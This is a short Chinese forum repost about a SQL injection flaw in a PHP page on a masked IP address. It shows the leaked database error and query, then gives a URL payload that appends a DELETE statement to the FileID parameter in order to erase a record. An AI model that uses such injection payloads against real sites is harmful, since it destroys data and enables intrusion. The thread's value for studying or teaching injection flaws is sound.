学习型 ASP/PHP/ASP.NET 主机 30元/年全能 ASP/PHP/ASP.NET 主机,支持月付专业 MSSQL 数据库空间,支持月付专业 MySQL 数据库空间,支持月付
发新话题
打印

[转帖]SQL漏洞

[转帖]SQL漏洞

前一阵子,发现了一些漏洞 http://XXX.XXX.XXX.XXX/display/read.php?FileID=951' Warning: SQL error: [Microsoft][ODBC SQL Server Driver][SQL Server]第 1 行: '\' 附近有语法错误。, SQL state 37000 in SQLExecDirect in D:\www\include\odbc.inc on line 60 Database error: Invalid SQL: SELECT FileID,Title,Author,FileType,Content,CourseID,PubClass, MediaType,InputTime,TopicCode FROM File_Info_T WHERE (FileID=997\') ODBC Error: 1 (General Error (The ODBC interface cannot return detailed error messages).) Session halted. FileID没有过滤才会出现这个结果,我想如果这样提交URL: http://XXX.XXX.XXX.XXX/display/read.php?FileID=951)%20delete%20File_Info_T%20where%20(FileID=951 就可以删这个信息了...

TOP

四月天原创文学网 http://yc.4yt.net

TOP

发新话题